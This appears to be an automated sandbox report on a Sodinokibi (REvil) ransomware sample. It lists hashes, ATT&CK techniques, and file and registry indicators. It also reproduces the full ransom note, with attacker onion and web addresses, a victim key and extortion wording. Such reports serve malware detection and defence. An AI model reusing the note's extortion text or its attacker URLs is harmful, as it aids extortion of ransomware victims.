sodinokibi | 280268db673f66dc31e54d86de101cf8b5d52c583a9282d9c7ccb4475612a8e0

Analysis

max time kernel
315s
max time network
317s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
20-11-2024 13:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
Size

164KB
MD5

9a2888ddc389ecde165446d6e3c27f80
SHA1

bf77c02c5a58b5efb29db4191f7e38853dcc3c90
SHA256

db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b
SHA512

9473b40f0b50d3960395e59ca23b8809cb982185f684989d1641c9193c8d2325d2d0843e66421bfdedac26e850bb3d4a9abae06741f7dfb11cf402abcfbdf3b7
SSDEEP

3072:FHixaVZFiOCDJtOicNDWEzZC6cau/SCBB:FHigLF5CCj5zZC1SC/

Score

10^/10

sodinokibi discovery ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\e99x17132-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension e99x17132. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/064E0B6786239CD7 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/064E0B6786239CD7 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: pSiqBwJWhWHI4qA9U8RiWbbgqGCD+tj+aoTbB/Z2af7oxKKKOls5zgT0cBeQBJDw yw86Bod0EGyMnZ4cXRXRu+MwuwH3H7v3XUCatDQifbyShEFxgYvcRhdJQ8GWFiXn qra1B8NYit5OgtBvKL1ff6+Sem0FNTvJfTRtDgLALZbQyfYZjNJFpeUjiuhhYua0 eQwxpN6pksIDdYvxdp1uO4r3dvJEXvGhqfmvFIDRGmhQY1D4HFuf5lk2UCv5HfUD ZyDVrprvi1gnn7Brkg2m0CJTW/g0dld5266K4oKWFrDxMetgMCklv2dDIMWusEjm qfDbw5FjaI1Z9DJWLpquF1IbWXVL0jy7Fb2gT4zSjD4JxfIWvvttoI6dtbC5o8fx 4XhBtnbsdFaKjX/Kd+WEvt+UVl94qPCQSiK9VFlbh2BUXPRI66U+s0Q3Db02wVpE kbziG6tzJ/BHn57l3CHqkPJTMmNXsJzwSmSRb1YIY7FWMnBszyyxP1uqqHq0m6kf ExGDiErcq1vm3P+0hI/ajd4B1p6olCFg8PjVgfc4CihdCpE9kkE7bUUQPH+ampXh H6SBqjXlHhILN8Npm7CguCqZ6kSFOhnzukrkASVncZL1D35CN81dYalXdcx++pb9 w4mi0vLaqfNulWzZ0ItJnbM0XgI7IIO779xRtT0GCNRdrfdyg+AvlGKMzawvPv7N el95dmTkhKCc9G6AVvQJpqXdQQ5Mp5wj+yzwY0HR9byBEutwbHgjnaLsCSi6xcDy ZGnks5vhotFpj2X4lqxdU2pk3AadWeNvuWx0pzaY/9IJGeP0f3wZk3Jgf0oPVhwx Wvzzj41zzKC4WHy6ow/D75vVTx2qxcGY0VDkVRNUe/AvyWk4QxV9z2pshY3RCjJz SGIKC3Gtec3Q9537nhFWWzvzozry+ZWQGl9APWyc8kVVtWVOwGtac/HpqyHzs5iX MZfJX8dWiglijYIafHWqYkkb7Nnx2bu58ApFIWf7ZLXfuub9wYyM0QqRFjBRGmMS Tb5GlKuxLq8JMeeemySnAfRsuvU47sLYWZM5z6O5c/37UkXPXOG/Kot39HNKAB5/ X0CgpR3OkgKPabjtLao5Koaz+zJpmMqwoeuXlKhorP5h1m9jgeywrisUIIRZOpVd DqUfCEy9+2OdCpC3gEhMxOPE4y8X9pVOkjaQWZ/1NJygHv6AAu01R23tsZSiCKv/ F+cSJewpwjHnCz/U+/B4p3l6 Extension name: e99x17132 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/064E0B6786239CD7

http://decryptor.top/064E0B6786239CD7

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Sodinokibi family
sodinokibi
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\B:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\G:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\H:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\K:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\P:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\S:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\D:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\E:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\I:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\L:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\M:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\V:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\Y:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\Z:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\A:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\J:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\N:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\O:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\U:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\X:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\F:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\Q:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\R:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\T:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\W:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\aou3fjd.bmp"	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe

Drops file in Program Files directory 32 IoCs

description	ioc	Process
File opened for modification	\??\c:\program files\UnblockUnpublish.mht	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\UnprotectConvertTo.xps	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\e99x17132-readme.txt	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\e99x17132-readme.txt	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\CloseConfirm.vst	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\StartGroup.3gp	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\SwitchConvertFrom.xml	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\UnblockJoin.ogg	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\CheckpointStep.xltx	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\ConvertToOpen.mp4	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\CloseResolve.odp	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\LimitShow.aiff	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\SwitchPublish.DVR	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\PublishPing.eps	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\RevokeImport.wps	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\UninstallSet.vsdx	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\UnregisterWait.dwg	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File created	\??\c:\program files (x86)\e99x17132-readme.txt	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\StopLimit.temp	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File created	\??\c:\program files (x86)\microsoft sql server compact edition\e99x17132-readme.txt	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File created	\??\c:\program files\e99x17132-readme.txt	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\CompareStep.ttf	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\ResumeRepair.001	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\UndoInstall.vst	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\ConnectLimit.potx	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\RedoSubmit.mp3	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\ShowMerge.dxf	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\SaveUnpublish.php	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\AssertUndo.sql	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\CompareEnable.easmx	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\CompleteRegister.pptm	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	\??\c:\program files\MergePing.vstm	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_6.1.7600.16385_it-it_5f3874d6c7dfca9f_winload.efi.mui_35ee487d	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-session0viewer_31bf3856ad364e35_6.1.7600.16385_none_483083fb94bfc714.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-u..dem-voice.resources_31bf3856ad364e35_6.1.7600.16385_de-de_44de21d027258ae6_serwvdrv.dll.mui_6a9f4568	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-a..on-authui.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_ba2335c8bba30fbf.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-s..pp-client.resources_31bf3856ad364e35_6.1.7600.16385_it-it_c5cb371e0d8c117f_slc.dll.mui_dc24f809	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-aclui.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_404998b8bd95c42f_aclui.dll.mui_adadbfb7	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-session0viewer_31bf3856ad364e35_6.1.7600.16385_none_3ddbd9a9605f0519.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-b..nager-efi.resources_31bf3856ad364e35_6.1.7600.16385_el-gr_da723e1e02d551df.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-d..-usermode.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_51a9c0732ea27a7c_wudfx.mfl_ed9a43c5	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft.windows.winhttp_31bf3856ad364e35_5.1.7601.17514_none_bac5319939f7951a.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-advapi32.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_a34eb21187cbf59e_advapi32.dll.mui_28c7718f	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-s..-usermode.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_9d396ba2aef41ee0_ntmarta.dll.mui_027ef4fc	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-cdfs_31bf3856ad364e35_6.1.7600.16385_none_025c84b636a4ef6d_cdfs.sys_02574081	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-s..resources.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_f9fce189b9d4bb7e.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-tcpip.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_fae917b2ebbd936e_netiougc.exe.mui_ad7a9e4d	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-crypt32-dll_31bf3856ad364e35_6.1.7601.17514_none_b995c74af473511b_crypt32.dll_9c3ccf73	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-u..em-config.resources_31bf3856ad364e35_6.1.7600.16385_it-it_7a60e7beae811506.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-s..edstorage.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_71755af76007c973_psbase.dll.mui_c28690ab	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-searchfolder.resources_31bf3856ad364e35_6.1.7600.16385_de-de_305b8c9d36da5a85.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-u..assdriver.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_886e569d9951dc2a.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-u..erservice.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_7b8cb08f68cb8358.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-gdi32_31bf3856ad364e35_6.1.7601.17514_none_b7a4af6b5ff115ac_gdi32.dll_1f014d57	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-sxssrv_31bf3856ad364e35_6.1.7600.16385_none_bc7acb14d0edfca2_sxssrv.dll_4cd0c747	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-ldap-client.resources_31bf3856ad364e35_6.1.7600.16385_es-es_db0d9c648881a022.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-com-base.resources_31bf3856ad364e35_6.1.7600.16385_it-it_a11f76f021849262.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-w..ure-other.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ac553040a56eff44.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-spp-main.resources_31bf3856ad364e35_6.1.7600.16385_es-es_c056ed88bb41a9ca_sxproxy.dll.mui_f9d8f818	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-sendmail.resources_31bf3856ad364e35_6.1.7600.16385_it-it_d8127e0b662b3fd6.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-session0viewer_31bf3856ad364e35_6.1.7600.16385_none_3ddbd9a9605f0519_wls0wndh.dll_dbf333a5	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-c..ermodepnp.resources_31bf3856ad364e35_6.1.7600.16385_it-it_d42827dcf5e8c98a_umpnpmgr.dll.mui_d66aed17	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-d..lient-dll.resources_31bf3856ad364e35_6.1.7600.16385_es-es_b1a74ee1d3e85ebf_dhcpcmonitor.dll.mui_478a7103	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-tabletpc-softkeyboard_31bf3856ad364e35_6.1.7601.17514_none_2fd7b56967fc5c76_ja-jp-sym.xml_2e09b261	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-i..tional-codepage-775_31bf3856ad364e35_6.1.7600.16385_none_2ae98cfeb4d93dfc_c_775.nls_b28dc44c	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-mlang.resources_31bf3856ad364e35_6.1.7600.16385_uk-ua_0c40c3925a9ae4c4.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-x..ollmentui.resources_31bf3856ad364e35_6.1.7600.16385_de-de_ebe07673c51f7fbc.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-rpc-endpointmapper_31bf3856ad364e35_6.1.7600.16385_none_a687702cfc47837d_rpcepmap.dll_f3295d6a	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-verifier_31bf3856ad364e35_6.1.7600.16385_none_25fa2709e25e715f.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-p..installerandprintui_31bf3856ad364e35_6.1.7601.17514_none_3eceef6140ec9728_findnetprinters.dll_d9721533	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-a..structure.resources_31bf3856ad364e35_6.1.7600.16385_es-es_53e89731b078cab8.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-comctl32-v5.resources_31bf3856ad364e35_6.1.7600.16385_he-il_a5612ff788fc14c2_comctl32.dll.mui_0da4e682	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-d..lient-dll.resources_31bf3856ad364e35_6.1.7601.17514_en-us_b40d05c5d0aff0b4_dhcpcsvc6.dll.mui_b45c7567	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-time-service.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_517d915ca0c7b0ce.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-x..rtificateenrollment_31bf3856ad364e35_6.1.7601.17514_none_51bcbc61a5466a58.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-b..isc-tools.resources_31bf3856ad364e35_6.1.7600.16385_de-de_964af31d4c0ac434.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-bitmap-system_31bf3856ad364e35_6.1.7600.16385_none_df4bbe8e10903104_85s1255.fon_3e2f9644	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-rasbase.resources_31bf3856ad364e35_6.1.7600.16385_de-de_1b70574614d51987_rascfg.dll.mui_0b036e1f	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_networking-mpssvc-svc.resources_31bf3856ad364e35_6.1.7601.17514_en-us_89701e1decba44ab_firewallapi.dll.mui_43c7a05b	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-c..vider-dll.resources_31bf3856ad364e35_6.1.7600.16385_en-us_06dfc9a050d64566.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-bitmap-system_31bf3856ad364e35_6.1.7600.16385_none_df4bbe8e10903104_vgasyst.fon_aefdfa30	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-profsvc_31bf3856ad364e35_6.1.7601.17514_none_59d75cdc494c95ea.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-efs-service.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_d7a848d023c8969c.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-s..ionengine.resources_31bf3856ad364e35_6.1.7600.16385_de-de_9c4c47a945609340_scesrv.dll.mui_c6e979b7	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-usermodensi.resources_31bf3856ad364e35_6.1.7600.16385_es-es_981164b3f9ab2ac9.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.7601.17514_none_83801b5eed6392d9.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-b..t-windows.resources_31bf3856ad364e35_6.1.7600.16385_es-es_783d473f4a0142a2.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-mlang.resources_31bf3856ad364e35_6.1.7600.16385_de-de_dd2822fe8544398a_mlang.dll.mui_2904864a	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
